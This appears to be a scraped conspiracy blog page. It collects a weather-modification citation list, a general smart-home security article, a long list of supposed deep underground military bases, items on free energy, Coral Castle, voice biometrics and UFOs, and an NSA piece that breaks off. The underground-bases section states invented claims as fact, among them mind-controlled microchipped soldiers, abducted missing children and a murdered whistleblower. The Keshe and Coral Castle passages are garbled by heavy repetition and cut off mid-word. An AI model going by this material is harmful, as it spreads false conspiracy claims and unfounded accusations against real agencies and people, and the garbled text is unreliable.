Interdepartmental Committee on Atmospheric Sciences memorandum to Homer E. Newell dated June 21, 1966, as it appeared in the appendix to “Present and Future Plans of Federal Agencies in Weather-Climate Modification” by the Interdepartmental Committee on Atmospheric Sciences Select Panel on Weather Modification, 1966

“The Interdepartmental Committee on Atmospheric Sciences: A Case History” by Robert E. Morrison

U.S. patent #5,003,186 “Stratospheric Welsbach Seeding for Reduction of Global Warming,” 1991

“Multiple Instrument Studies of Chemical Releases and Heating at Arecibo” by Stanford Research International, published by Stanford Research International, 1994

“Air Force 2025” by the U.S. Air Force, published by the U.S. Air Force, 1996

“An Operational Analysis for Air Force 2025” by the U.S. Air Force, published by the U.S. Air Force as part of “Air Force 2025” by the U.S. Air Force, published by the U.S. Air Force, 1996

Global Warming and Ice Ages by Edward Teller, Lowell Wood and Roderick Hyde, published by the Lawrence Livermore National Laboratory, 1997

 

via PeterKirby/ActivistPost

 

Home Hacks and Smart Grids: Data Theft Made Even Simpler

Home Hacks and Smart Grids: Data Theft Made Even Simpler

There is often times a trade-off between security and convenience. With Home Hacks the more easily you can access your personal data, the easier someone else can too, making anything that you put online a potential target for hackers. A growing source of concern for many people is their home security and home automation systems.

Home automation is just starting to come into its own, with more home appliances having the capability to be networked, monitored, and controlled from your computer, phone, or other device. The collection of networked devices is commonly referred to as “the Internet of things” since we’re able to sync almost anything we’d like to the internet and, thus, each other. While home automation is not a new idea, it is only more recently that it has become mainstream and available to the masses while also having a more affordable price. This means you could be able to control many different aspects of your home from anywhere at any time. You can set your own schedules and preferences for things like lights, temperature, door locks, or a home security system.

However, along with the convenience of having all this control and information at your fingertips, there are vulnerabilities to worry about. Once your data is online, it becomes a potential target for hackers and malware. And now it isn’t just personal data there is also the threat of hackers being able to remotely shut down your home security system, or detect when you are not at home. Forbes recently reported on a series of incidents where Insteon smart home systems were installed with no password protection, allowing anyone to easily gain control of a complete stranger’s home.

Another security flaw with some of these devices, like the Mi Casa Verde MIOS VeraLite, is that once connected to a WiFi network, the device assumes anyone is an authorized user. So potential hackers need only connect to someone’s WiFi network (something even a novice could do) to gain control of the house.

These stories highlight the need to take security more seriously, both on the part of manufacturers developing more robust security features, and users taking advantage of these features.  For those questioning the security of your home automation, it is important to make sure that any home automation devices are password protected (with 128-bit encryption if possible), and that your home WiFi network and router are also securely behind strong passwords. There are some companies like ADT that monitor these things for you, but if you’re using a build as you go, DIY type system like Wink, you’ll need to pay special attention to this. Make sure any firmware or software updates are installed promptly when security flaws are found and patched. Never use a default password. In fact, it is good practice to periodically change your passwords. With a bit of care, you can safely enjoy the convenience of an automated home.

Tying into the concept of a hyper-connected home, like Home Hacks, and bring some of the same concerns, is the growing technology behind smart grids and smart meters. The so-called smart meter lets consumers see how much power is being used in their homes on an hourly basis. These meters are connected to the smart grid, which allows power companies to adjust prices based on demand and supply, while the added information lets consumers adjust their consumption habits. But there are privacy concerns about utility companies collecting massive amounts of data about their customers and their habits. Similar to hacking a home automation system, if hackers obtained data from a smart meter they could potentially gather personal information as well, determine things like when the house is empty, or even run up fake charges shut down the power.

In May of 2014, the White House released a report called “Big Data: Seizing Opportunities, Preserving Values” which recognized the dangers of all this data being collected, and the need to protect privacy. Currently, the major federal legislation regarding smart grids is the Energy Independence and Security Act of 2007, which created various committees and councils to establish standards and protocols for upgrading to smart grids. Several states have passed their own laws to encourage smart grid development, including California, Maryland, and Illinois.

While smart meters have been touted as a way for consumers to save money on energy bills while helping the energy system as a whole run more efficiently, the two way communication the smart meters permit, the health risks they present, and the lack of demonstrated savings or efficiency increases for many who are using them, have some commentators speculating that smart meters are more trouble than they’re worth. On top of this there are no laws against keeping the government or utilities companies away from personal data obtained through these devices (not that laws would stop them from doing so anyway), and thus no protection for citizens. Home Hacks.

Since they’re inherently controlled by the utilities, smart meters seem highly unlikely to be a secure solution for the average homeowner. Your best bet to get the most out of a smart home and both understand and reduce your energy costs is to stay away from smart meters altogether, and use a home automation system to help control your energy usage – just make sure that it’s a system that you can harden against outside intrusion.

Deep Underground Military Bases Hidden by Hollywood

Deep Underground Military Bases Hidden by Hollywood

DEEP UNDERGROUND MILITARY BASES  Unknown to most Americans is a dark secret, and it’s right under our noses. It’s the reality of the existence of DEEP UNDERGROUND MILITARY BASES. These Underground bases get prominent play in dark rumors circulating about captured extraterrestrials and alien technology.

In America alone there are over 120 Deep Underground Military Bases situated under most major cities, US AFBs, US Navy Bases and US Army Bases, as well as underneath FEMA Military Training Camps and DHS control centers. There are also many Deep Underground Military Bases under Canada. Almost all of these bases are over 2 miles underground and have diameters ranging from 10 miles up to 30 miles across!

They have been building these bases day and night, unceasingly, since the 1940s. These bases are basically large cities underground connected by high-speed magneto-levity trains that have speeds up to 1500 MPH. Several books have been written about this activity.

Richard Souder, a Ph.D. architect, risked his life by talking about this. He is the author of the book, ‘Underground Bases and Tunnels: What is the Government Trying to Hide’.

He worked with a number of government agencies on deep underground military bases. The average depth of these bases is over a mile, and they again are basically whole cities underground. They have nuclear powered laser drilling machines that can drill a tunnel seven miles long in one day. (Note: The September, 1983 issue of Omni (Pg. 80) has a color drawing of ‘The Subterrene,’ the Los Alamos nuclear-powered tunnel machine that burrows through the rock, deep underground, by heating whatever stone it encounters into molten rock.)

Murdered for Whistleblowing on his involvement in (being tricked into helping design), Deep Underground Military Bases

Demolition & Structural Engineer

DUMBs Whistleblower Phil Schneider died from suicide, ‘officially’.   His own catheter, strangled him, while he was limited to his own wheel chair.  Suspicious?  Anyone with functional brain would probably think so.

 

 

This base is the Geo location ‘Area’ where MH 730 (Malaysian Airliner) went Missing
Coincidence?

Hidden in Plain Sight – Hollywood
Zombie Thriller
RESIDENT EVIL

(2003) If Hollywood is Showing us in the Movies, then they already have it long before they potentially ‘give the enemy ideas’.  Interesting position that puts the secret keepers in..

This is BY FAR the Most Accurate ‘Hollywood‘ Depiction of a very real ‘Deep Underground Military Base’.    DULCE underground Facililty (well documented) has been presented in a similar way.

Massively Popular – Now Cult Classic Video GameHalf Life‘ Plot is Centered around a Secret Underground Government Lab, Where Things Go Awry…

Plot

Physicist Gordon Freeman arrives late for work at the Black Mesa Research Facility. As part of an experiment, he pushes an unusual material into a machine for analysis. The spectrometer explodes, creating a “resonance cascade” that opens a portal to another dimension, Xen. Surviving scientists urge Gordon to head to the surface, where he defends himself against hostile Xen creatures and Marines sent to cover up the incident.

This Topic is Directly Connected
to the Occult / UFO / Secret Technology,

and Especially, the Human Trafficking
of Woman and Children

In America alone there are over 120 Deep Underground Military Bases situated under most major cities, US AFBs, US Navy Bases and US Army Bases, as well as underneath FEMA Military Training Camps and DHS control centers. There are also many Deep Underground Military Bases under Canada. Almost all of these bases are over 2 miles underground and have diameters ranging from 10 miles up to 30 miles across! They have been building these bases day and night, unceasingly, since the 1940s. These bases are basically large cities underground connected by high-speed magneto-levity trains that have speeds up to 1500 MPH. Several books have been written about this activity. Richard Souder, a Ph.D. architect, risked his life by talking about this. He is the author of the book, ‘Underground Bases and Tunnels: What is the Government Trying to Hide’. He worked with a number of government agencies on deep underground military bases. The average depth of these bases is over a mile, and they again are basically whole cities underground. They have nuclear powered laser drilling machines that can drill a tunnel seven miles long in one day. (Note: The September, 1983 issue of Omni (Pg. 80) has a color drawing of ‘The Subterrene,’ the Los Alamos nuclear-powered tunnel machine that burrows through the rock, deep underground, by heating whatever stone it encounters into molten rock.)

The Black Projects sidestep the authority of Congress, which as we know is illegal. There is much hard evidence out there. Many will react with fear, terror and paranoia, but you must snap out of it and wake up from the brainwashing your media pumps into your heads all day long. Are you going to be a rabbit in the headlights, or are you going to stand up and say enough is enough? The US Government through the NSA, DOD, CIA, DIA, ATF, ONI, US Army, US Marine Corp, FEMA and the DHS has spent in excess of 12 trillion dollars building the massive, covert infrastructure for the coming One World Government and New World Religion over the past 40 years.

There is the Deep Underground Military Base underneath Denver International Airport, which is over 22 miles in diameter and goes down over 8 levels. It’s no coincidence that the CIA relocated the headquarters of its domestic division, which is responsible for operations in the United States, from the CIA’s Langley headquarters to Denver. Constructed in 1995, the government and politicians were hell bent on building this airport in spite of it ending up vastly overbudget. Charges of corruption, constant construction company changes, and mass firings of teams once they had built a section of their work was reported so that no “one” group had any idea what the blueprint of the airport was. Not only did locals not want this airport built nor was it needed, but everything was done to make sure it was built despite that. Masonic symbols and bizarre artwork of dead babies, burning cities and women in coffins comprise an extensive mural as well as a time capsule – none of which is featured in the airport’s web site section detailing the unique artwork throughout the building. DIA serves as a cover for the vast underground facilities that were built there. There are reports of electronic/magnetic vibrations which make some people sick and cause headaches in others. There are acres of fenced-in areas which have barbed wire pointing into the area as if to keep things in, and small concrete stacks that resemble mini-cooling towers rise out of the acres of nowhere to apparently vent underground levels. The underground facility is 88.3 square miles deep. Basically this Underground Base is 8 cities on top of each other! The holding capacity of such leviathanic bases is huge. These city-sized bases can hold millions and millions of people, whether they are mind controlled, enslaved NWO World Army Soldiers or innocent and enslaved surface dwellers from the towns and cities of America and Canada.

There is Dulce Base, in New Mexico. Dulce is a small town in northern New Mexico, located above 7,000 feet on the Jicarilla Apache Indian Reservation. There is only one major motel and a few stores. It’s not a resort town and it is not bustling with activity. But Dulce has a deep, dark secret. The secret is harbored deep below the brush of Archuleta Mesa. Function: Research of mind related functions, genetic experiments, mind control training and reprograming. There are over 3000 real-time video cameras throughout the complex at high-security locations (entrances and exits). There are over 100 secret exits near and around Dulce. Many around Archuleta Mesa, others to the south around Dulce Lake and even as far east as Lindrith. Deep sections of the complex connect into natural cavern systems. Level 1 – garage for street maintenance. Level 2 – garage for trains, shuttles, tunnel-boring machines and disc maintenance. Level 3 – everyone is weighed, in the nude, then given a jump suit uniform. The weight of the person is put on a computer I.D. card each day. Change in over three dollars requires a physical exam and X-ray. Level 4 – Human research in ‘paranormal’ areas – mental telepathy, mind control, hypnosis, remote viewing, astral traveling – etc. The technology is apparently here to allow them to know how to manipulate the ‘Bioplasmic Body’ Development of a laser weapon that can remotely cause burns and discomfort on it’s target. They can lower your heartbeat with Deep Sleep ‘Delta Waves,’ induce a static shock, then reprogram, Via a Brain- Computer link. Level 5 -security is severe. Armed guards patrol constantly, and in addition to weight sensitive areas there (are) hand print and eye print stations. Here, is the device that powers the transfer of atoms. Level 6 – Level 6 is privately called ‘Nightmare Hall’. It holds the genetic labs. Experiments done on fish, seals, birds, and mice that are vastly altered from their original forms.

Then there is the Greenbrier Facility, in White Sulfer Springs, West Virginia under the Greenbriar Resort. The Continuity of Government facility intended since 1962 to house the United States Congress, code-named Casper, is located on the grounds of the prestigious Greenbrier resort. The bunker is beneath the West Virginia wing, which includes a complete medical clinic. Construction of the facility, which began in 1959, required 2.5 years and 50,000 tons of concrete. The steel-reinforced concrete walls of the bunker, which is 20 feet below ground, are 2 feet thick. The facility includes separate chambers for the House of Representatives and the Senate, as well as a larger room for joint sessions. These are located in the “Exhibit Hall” of the West Virginia Wing, which includes vehicular and pedestrian entrances which can be quickly sealed by blast doors. They don’t even hide this one, and it’s even a tourist attraction. The Underground vault was built to meet the needs of a Congress-in-hiding – in fact the hotel is a replica of the White House. The underground area has a chamber for the Senate, a chamber for the House and a massive hall for joint sessions. Although the hotel says it gives tours of the 112,000 square area daily, the installation still stands at the ready, its operators still working under cover at the hotel. The secrecy that has surrounded the site has shielded it both from public scrutiny and official reassessment.

Most Americans will not believe that an American Holocaust will happen until they see it happening with their own eyes. Till then, it is just another strange conspiracy theory for them to laugh at. This is no laughing matter. When it happens, it will be to late to stop it. The US Government has been involved covertly in the creation of an army of loyal, brainwashed soldiers of the future. They will have cybernetic and microchip implants and will fight anywhere in the world, without question, with total loyalty and without hesitation or fear. These soldiers were created at Brookhaven National Laboratories BNL, the National Ordinance Laboratories NOL and the Massachussetts Institute of Technology MIT, and covertly transferred under DOD and NSA control and planning. Many of these soldiers are stationed in the Deep Underground Military Bases like the one under Denver International Airport. All of this information has been researched, and it has taken much effort to fit it together properly. There are many mag-lev subterraenean train networks that stretch from the these complexes and go out to other underground bases. All soldiers working in these bases are microchipped and under total Psychotronic Mind Control.
Of the missing “Milk Carton People” that the FBI used to post on milk cartons, some were taken to these underground bases for genetic experimentation, microchipping, psychotronic mind control and cybernetic implantations for future use as brainwashed soldiers of the NWO. Every year in America hundreds of thousands of people go missing. The creation of a total Global Fascist Police State by the Illuminati will happen if we do not all wake up and see what is happening. I find it amazing that so many Americans, Scandanavians and Western Europeans refuse to believe that there are millions of UNISF and UNMNTF Troops in America. Under the Partnerships For Peace Program PFPP set up by President Bill Clinton in early 1993, thousands of troops a month have been coming into America. These Fascist criminals parade as our friends and leaders, while stripping away democratic rights that will be replaced with a Corporatist and Fascist dictatorship, unless people, and especially Americans, wake up now. Here are the locations of some Deep Underground Military Bases in America:

ALASKA 1. Brooks Range, Alaska 2. Delta Junction, Alaska 2a. Fort Greeley, Alaska. In the same Delta Junction area.

ARIZONA 1. Arizona (Mountains) (not on map) Function: Genetic work. Multiple levels 2. Fort Huachuca, Arizona (also reported detainment camp) Function: NSA Facility 2. Luke Air Force Base 3. Page, Arizona Tunnels to: Area 51, Nevada Dulce base, New Mexico 4. Sedona, Arizona (also reported detainment camp) Notes: Located under the Enchantment Resort in Boynton Canyon. There have been many reports by people in recent years of “increased military presence and activity” in the area.5. Wikieup, Arizona Tunnels to: Area 51 6. Yucca (Mtns.), Arizona

CALIFORNIA 1: 29 Palms, California Tunnels to: Chocolate Mts., Fort Irwin, California (possibly one more site due west a few miles) 2: Benicia, California 3. Catalina Island, California Tunnels to: I was told by someone who worked at the Port Hueneme Naval Weapons Division Base in Oxnard that they have heard and it is ‘common rumor’ that there is a tunnel from the base to this Island, and also to Edwards Air Force Base, possibly utilizing old mines. . 4. China Lake Naval Weapons Testing Center 5. Chocolate Mountains, California Tunnels to: Fort Irwin, California 6. Death Valley,California Function: The entrance to the Death Valley Tunnel is in the Panamint Mountains down on the lower edge of the range near Wingate Pass, in the bottom of an abandoned mine shaft. The bottom of the shaft opens into an extensive tunnel system 7. Deep Springs, California Tunnels to: Death Valley, Mercury, NV, Salt Lake City 8. Edwards AFB, California Function: Aircraft Development – antigravity research and vehicle development Levels: Multiple Tunnels to: Catalina Island Fort Irwin, California Vandenburg AFB, California Notes: Delta Hanger – North Base, Edwards AFB, Ca. Haystack Buttte – Edwards, AFB, Ca. 9. Fort Irwin, California (also reported detainment camp) Tunnels to: 29 Palms, California Area 51, Nevada Edwards AFB. California Mt. Shasta, California 10. Helendale, California Function: Special Aircraft Facility Helendale has an extensive railway/shipping system through it from the Union Pacific days which runs in from Salt Lake City, Denver, Omaha, Los Angeles and Chicago 11. Lancaster, California Function: New Aircraft design, anti-gravity engineering, Stealth craft and testing Levels: 42 Tunnels To: Edwards A.F.B., Palmdale 12. Lawrence-Livermore International Labs, California The lab has a Human Genome Mapping project on chromosome #19 and a newly built $1.2 billion laser facility 13. Moreno Valley, California Function unknown 14. Mt. Lassen, California Tunnels to: Probably connects to the Mt. Shasta main tunnel. 15. Mt. Shasta. Function: Genetic experiments, magnetic advance, space and beam weaponry. Levels: 5 Tunnels to: Ft. Irwin, California North 16. Napa, California Functions: Direct Satellite Communications, Laser Communications. Continuation of Government site. Levels: Multi-level Tunnels to: Unknown Notes: Located on Oakville Grade, Napa County, Ca. 87 Acres 17. Needles, California Function unknown 18. Palmdale, California Function: New Aircraft Design, anit-gravity research 19. Tehachapi Facility (Northrop, California – Tejon Ranch Function: Levels: 42 Tunnels to: Edwards, Llona and other local areas Notes: 25 miles NW of Lancaster California, in the Tehachapi mountains. 20. Ukiah, California Function unknown

COLORADO 1. Near Boulder, Co. in the mountains Function unknown 2. Cheyenne Mountain -Norad -Colorado Springs, Colorado Function: Early Warning systems – missile defense systems – Space tracking Levels: Multiple Tunnels to: Colorado Springs, Function: Early warning systems, military strategy, satellite operations Levels: Multiple NORAD is a massive self-sustaining ‘city’ built inside the mountain Tunnels to: Creede, Denver, Dulce Base, Kinsley. 3. Creede, Colorado Function unknown Tunnels to: Colorado Springs, Colorado – Delta, Colorado – Dulce Base, New Mexico 4. Delta, Colorado Function unknown Tunnels to: Creede Salt Lake, Utah 5. Denver International Airport (also a detainment camp) Function: Military research, construction, detainment camp facilities Levels: 7 reported Tunnels to: Denver proper, Colorado and Rocky Mountain “safehousing”, Colorado Springs, Colorado (Cheyenne Mtn.)

6. Falcon Air Force Base, Falcon, Colorado Function: SDI, Satellite Control Levels: Multiple Tunnels to: Colorado Springs, possibly more. 7. Fort Collins, Colorado Function: Suspect high precision equipment manufacturing for space. 8. Grand Mesa, Colorado Function unknown 9. Gore Range Near Lake, west of Denver, Co. Function: Library and Central Data Bank 10. San Juan Valley, Colorado Hidden beneath and in an operating Buffalo Ranch Function unknown 11. Telluride, Colorado Function unknown 12. University of Denver, Co (Boulder area) Function: Genetics, geology/mining as related to tunneling and underground construction. 13. Warden Valley West of Fort Collins, CO Function Unknown Tunnels to: Montana

GEORGIA Dobbins Air Force Base, Marrietta GA Function: test site for plasma and antigravity air craft, experimental crafts and weapons

INDIANA Kokomo, Indiana Function Unknown Notes: for years people in that area have reported a “hum” that has been so constant that some have been forced to move and it has made many others sick. It seems to come from underground, and “research” has turned up nothing although it was suggested by someone that massive underground tunneling and excavating is going on, using naturally occurring caverns, to make an underground containment and storage facility.

KANSAS 1. Hutchinson, Kansas Function unknown Tunnels to: Kinsley, Nebraska. Note: I recieved this report concerning this base: “I can vouch for the underground base in Hutchinson, Ks. The entrance to the tunnel is underneath Hutchinson Hospital and is huge. I was walking down that tunnel when I was a kid and at the end of this tunnel is a rock face wall with a 90 degree turn to the right. I stopped and refused to go any further down the tunnel, my instincts told me to stop. I distinctly remember hearing screams coming from there. These were not just cries for help, but more like blood curtailing horrifying screams like someone had just been murdered. I really want to know what was and probably still is going on down there. You are free to report the story, but please keep my name anonymous.” 2. Kansas City, Kansas Function unknown Notes: Entrance near Worlds of Fun 3. Kinsley, Kansas Function unknown Tunnels to: Colorado Springs, Colorado; Hutchinson, Kansas; Tulsa Kokoweef Peak, SW California Notes: Gold stored in huge cavern, blasted shut. Known as the “midway city” because it’s located halfway between New York and San Francisco.

MARYLAND Edgewood Arsenal, Maryland (from Don) Martins AFB, Aberdeen Proving Ground, Maryland

MASSACHUSETTS Maynard MA, FEMA regional center. Wackenhut is here too.

MONTANA Bozeman, Mont. Function: Genetics

NEVADA Area 51 – Groom Lake – Dreamland – Nellis Air Force Base Area 51 was said to exist only in our imaginations until Russian satellite photos were leaked to US sources and it’s amazing how you can get photos all over of it now, even posters. They’ve been busy little bees building this base up. Function: Stealth and cloaking Aircraft research & development. ‘Dreamland (Data Repository Establishment and Maintenance Land) Elmint (Electromagnetic Intelligence), Biological weapons research and genetic manipulation/warfare storage, Cold Empire, EVA, Program HIS (Hybrid Intelligence System),BW/CW; IRIS (Infrared Intruder Systems), Security: Above ground cameras, underground pressure sensors, ground and air patrol 2. Blue Diamond, Nevada Function unknown 3. Fallon Air Force Base area (the flats, near Reno) “American City” restricted military sites southwest of Fallon 4. Mercury, Nevada Function unknown 5. Tonopah, Nevada Function unknown 69: San Gabriel (mountains) On Western side of Mojave Desert Function unknown Notes: Heavy vibrations coming from under the forest floor which sounds like geared machinery. These vibrations and sounds are the same as heard in Kokomo, Indiana and are suspected underground building/tunneling operations.

NEW MEXICO 1. Albuquerque, New Mexico (AFB) Function unknown Levels: Multiple Tunnels to: Carlsbad, New Mexico Los Alamos, New Mexico Possible connections to Datil, and other points. 2. Carlsbad, New Mexico Functions: Underground Nuclear Testing Tunnels to: Fort Stockton, Texas. Roswell 3. Cordova, New Mexico Function unknown 4. Datil, New Mexico Function unknown Tunnels to: Dulce Base

5: Dulce Base, New Mexico. Tunnels to: Colorado Springs, Colorado Creed, Colorado Datil, N.M. Los Alamos. Page, Arizona Sandia Base Taos, NM

6. Los Alamos, New Mexico Functions: Psychotronic Research, Psychotronic Weapons Levels: Multiple Tunnels to: ALB AFB, New Mexico Dulce, New Mexico Connections to Datil,Taos 7. Sandia Base, New Mexico Functions: Research in Electrical/magnetic Phenomena Levels: Multiple Tunnels to: Dulce Base Notes: Related Projects are studied at Sandia Base by ‘The Jason Group’ (of 55 Scientists). They have secretly harnessed the ‘Dark Side of Technology’ and hidden the beneficial technology from the public. 8. Sunspot, NM Function unknown 9. Taos, New Mexico Function unknown Tunnels to: Dulce, New Mexico; Cog, Colorado Notes: Several other sidelines to area where Uranium is mined or processed. 10. White Sands, NM Function: Missile testing/design Levels: Seven known

NEW HAMPSHIRE There may be as many as three underground installations in New Hampshire’s hills, according to reports.

NEW YORK New York, New York Function unknown Tunnels to: Capitol Building, D.C.

OHIO Wright-Patterson Air Force Base – Dayton, Ohio Function: Air Force Repository. Rumored to house stealth technology and prototype craft

OREGON 1. Cave Junction, Oregon Function: Suspected Underground UFO Base Levels: At least one Notes: Suspected location is in or near Hope Mountain. Near Applegate Lake, Oregon, just over into California. Multiple shafts, access areas to over 1500 feet depth. Built using abandoned mine with over 36 known miles of tunnels, shafts. 2. Crater Lake, Oregon Tunnels: possible to Cave Junction 3. Klamath Falls, Oregon 4. Wimer, Oregon (Ashland Mt. area) Function: Underground Chemical Storage Levels: At least one

PENNSYLVANIA Raven Rock, Pa (near Ligonier) Function: working back up underground Pentagon – sister site of Mt. Weather Notes: 650′ below summit, 4 entrances.

TEXAS 1. Calvert, Texas Function unknown 2. Fort Hood, Texas (also reported detainment camp) Levels: Multiple 3. Fort Stockton, Texas Function: Unknown Tunnels to: Carlsbad, New Mexico UTAH 1. Dugway, Utah Function: Chemical Storage, Radiation storage. 2. Salt Lake City Mormon Caverns Function: Religions archives storage. Levels: Multiple Tunnels to: Delta, Colorado & Riverton, Wyoming

VIRGINIA Mount Poney – Near Culpepper, Virginia Function unknown

WASHINGTON 1. Mt. Rainier, Washington Function unknown. Levels: Multiple Tunnels to: Unknown Yakima Indian Reservation Function unknown Notes: Southeast of Tacoma Washington, on the Reservation, in an area 40 by 70 miles. Unusual sounds from underground (Toppenish Ridge). Low flying Silver Cigar shaped craft seen to disappear into the Middle fork area of Toppenish creek.

Washington DC: The Function: Part of a massive underground relocation system to house select government and military personnel in the event of cataclysmic event. Tunnels to: New York City; Mt. Weather.

WEST VIRGINIA: Greenbrier Facility, White Sulfer Springs, West Virginia under the Greenbriar Resort.

WYOMING: Riverton, Wyoming Function unknown Tunnels to: Salt Lake, Utah Denver, Colorado.

Mehran Tavakoli Keshe – Science, Free Energy

Mehran Tavakoli Keshe – Science, Free Energy

Mehran Tavakoli Keshe is an Iranian-born (in 1958) nuclear engineer known for his research on plasma reactors and interests in free energy applications and for his claim that he pioneered a space technology that was, according to some, used by Iran and resulted in the subdue and capture of a US drone in December 2011 near the Iran-Afghanistan bordeIranian-born (in 1958) nuclear engineer known for his research on plasma reactors and interests in free energy applications and for his claim that he pioneered a space technology that was, according to some, used by Iran and resulted in the subdue and capture of a US drone in December 2011 near the Iran-Afghanistan bordeIranian-born (in 1958) nuclear engineer known for his research on plasma reactors and interests in free energy applications and for his claim that he pioneered a space technology that was, according to some, used by Iran and resulted in the subdue and capture of a US drone in December 2011 near the Iran-Afghanistan border.Mehran Tavakoli Keshe is an Iranian-born (in 1958) nuclear engineer known for his research on plasma reactors and interests in free energy applications and for his claim that he pioneered a space technology that was, according to some, used by Iran and resulted in the subdue and capture of a US drone in December 2011 near the Iran-Afghanistan bordeIranian-born (in 1958) nuclear engineer known for his research on plasma reactors and interests in free energy applications and for his claim that he pioneered a space technology that was, according to some, used by Iran and resulted in the subdue and capture of a US drone in December 2011 near the Iran-Afghanistan bordeIranian-born (in 1958) nuclear engineer known for his research on plasma reactors and interests in free energy applications and for his claim that he pioneered a space technology that was, according to some, used by Iran and resulted in the subdue and capture of a US drone in December 2011 near the Iran-Afghanistan border.

Mehran Tavakoli Keshe is an Iranian-born (in 1958) nuclear engineer known for his research on plasma reactors and interests in free energy applications and for his claim that he pioneered a space technology that was, according to some, used by Iran and resulted in the subdue and capture of a US drone in December 2011 near the Iran-Afghanistan bordeIranian-born (in 1958) nuclear engineer known for his research on plasma reactors and interests in free energy applications and for his claim that he pioneered a space technology that was, according to some, used by Iran and resulted in the subdue and capture of a US drone in December 2011 near the Iran-Afghanistan bordeIranian-born (in 1958) nuclear engineer known for his research on plasma reactors and interests in free energy applications and for his claim that he pioneered a space technology that was, according to some, used by Iran and resulted in the subdue and capture of a US drone in December 2011 near the Iran-Afghanistan border.Mehran Tavakoli Keshe is an Iranian-born (in 1958) nuclear engineer known for his research on plasma reactors and interests in free energy applications and for his claim that he pioneered a space technology that was, according to some, used by Iran and resulted in the subdue and capture of a US drone in December 2011 near the Iran-Afghanistan bordeIranian-born (in 1958) nuclear engineer known for his research on plasma reactors and interests in free energy applications and for his claim that he pioneered a space technology that was, according to some, used by Iran and resulted in the subdue and capture of a US drone in December 2011 near the Iran-Afghanistan bordeIranian-born (in 1958) nuclear engineer known for his research on plasma reactors and interests in free energy applications and for his claim that he pioneered a space technology that was, according to some, used by Iran and resulted in the subdue and capture of a US drone in December 2011 near the Iran-Afghanistan border.

Coral Castle

Coral Castle

Coral-CastleCoral Castle Coral Castle is a stone structure created by the Latvian-American eccentric and mysterious Edward Leedskalnin north of the city of Homestead, Florida in Miami-Dade County at the intersection of South Dixie Highway and SW 157th Avenue.Coral Castle is a stone structure created by the Latvian-American eccentric and mysterious Edward Leedskalnin north of the city of Homestead, Florida in Miami-Dade County at the intersection of South Dixie Highway and SW 157th Avenue.Coral Castle is a stone structure created by the Latvian-American eccentric and mysterious Edward Leedskalnin north of the city of Homestead, Florida in Miami-Dade County at the intersection of South Dixie Highway and SW 157th Avenue.Coral-CastleCoral Castle Coral Castle is a stone structure created by the Latvian-American eccentric and mysterious Edward Leedskalnin north of the city of Homestead, Florida in Miami-Dade County at the intersection of South Dixie Highway and SW 157th Avenue.Coral Castle is a stone structure created by the Latvian-American eccentric and mysterious Edward Leedskalnin north of the city of Homestead, Florida in Miami-Dade County at the intersection of South Dixie Highway and SW 157th Avenue.Coral Castle is a stone structure created by the Latvian-American eccentric and mysterious Edward Leedskalnin north of the city of Homestead, Florida in Miami-Dade County at the intersection of South Dixie Highway and SW 157th Avenue.

Your Voice is Being Used to ID and Track You

Your Voice is Being Used to ID and Track You

voice-print-ID

Voice biometrics—the use of voice-recognition software to record and use your speech patterns as a unique “fingerprint” that can be used to identify you—will be increasingly standardized for government and businesses in the next two to three years

Everybody has a unique voice—and it can now be used to track you.

That’s the burgeoning field of “voice biometrics,” and businesses and governments are increasingly using the technology to track individuals—an estimated 65 million voiceprints are now in corporate and government databases, according to the Associated Press. And the technology is now widely available, and spreading rapidly.

Among the companies that AP identifies as using biometrics are Barclays Bank, mutual fund manager Vanguard Group, and Turkish cell phone provider Turkcell. On the government side, US law enforcement uses voice biometrics to track inmates and paroled offenders, the Internal Revenue Department in New Zealand currently has 1 million voiceprints on record, and South Africa’s Social Security Agency has tallied 7 million voiceprints.

Via AP:

Activists worry that the popularity of voiceprinting has a downside.

“It’s more mass surveillance,” said Sadhbh McCarthy, an Irish privacy researcher. “The next thing you know, that will be given to border guards, and you’ll need to speak into a microphone when you get back from vacation.”

The legality of voice recording differs from country to country. In the United States, voice recording falls under state, rather than federal law, and rules differ from state to state. In 38 states and the District of Columbia, “conversations may be recorded if the person is party to the conversation, or if at least one of the people who are party to the conversation have given a third party consent to record the conversation. In California, Connecticut, Delaware, Florida, Illinois, Maryland, Massachusetts, Nevada, New Hampshire, Pennsylvania, Vermont, and Washington State, the consent of all parties of the conversation must be obtained in order to record a conversation,” according to Wikipedia.

Consent, of course, may be given without much thought—it might easily be buried in, for instance, a phone company’s terms of service, or an “all calls may be recorded for training purposes” notice on a phone call you sleep through.

Within the next two to three years, it’s expected that more and more companies will begin standardizing the use of voice biometrics as passwords—you’ll just speak your name or a phrase into the phone to identify yourself, instead of a password.

Of course, once locked in, voice biometrics could conceivably be used to track individuals in public places, meaning that the use of cell phones to monitor and track individuals could be obsolete, giving way to simply tracking any spoken word as long as it’s in the range of equipment sensitive enough to identify voice biometrics.

The Electronic Frontier Foundation has been sounding the alarm about biometrics and civil liberties violations since 2003—in this case, facial recognition technology. Documents released by Edward Snowden this summer reveal that the NSA collects over 55,000 facial recognition quality images a day through global surveillance programs—through e-mails, texts, social media, videoconferencing and more. As the NSA has been demonstrated to track and record nearly all cell phone calls, it presumably wouldn’t be much trouble to use that information for establishing a covert voice biometrics database.

Watch what you say—anywhere.

via UltraCulture.com

Extraterrestrial UFOs are real : Ben Rich Lockheed Skunk Works CEO Admits

Extraterrestrial UFOs are real : Ben Rich Lockheed Skunk Works CEO Admits

http://youtu.be/N7ahst8TMww

Ben Rich, the “Father of the Stealth Fighter-Bomber” and former head of Lockheed Skunk Works,had once let out information about Extraterrestrial UFO Visitors Are Real. He states “we’ve” been to the stars” and “have the technology to go to the stars”, however, put in context–as many insiders believe–we’ve been taken to other planets by means of extraterrestrial ships due to radiation belt, so while we have the technology to go, we have to be “taken due to radiation belt and our bodies would not handle it–i.e.–why some have proposed we ride along [?] … are taken [?]

The NSA Helped Israel Blackmail Palestinians

The NSA Helped Israel Blackmail Palestinians

israel-nsa-connections-palestine

Scores of former members of Israeli military intelligence’s very secret and quite elite Unit 8200 have publicly refused to collect information that is “used for political persecution” or “driving parts of Palestinian society against itself.”Courteous allies at the NSA, we now know, helped make that spying possible.

The news comes courtesy of the NSA’s chief unauthorized biographer, James Bamford, whose three-day Moscow bull session with traitorous notoriety prostitute, Edward Joseph Snowden, was the cover story in last month’s issue ofWIRED.

Writing Tuesday in the New York Times, Bamford disclosed this alarming new anecdote from his Snowden debrief:

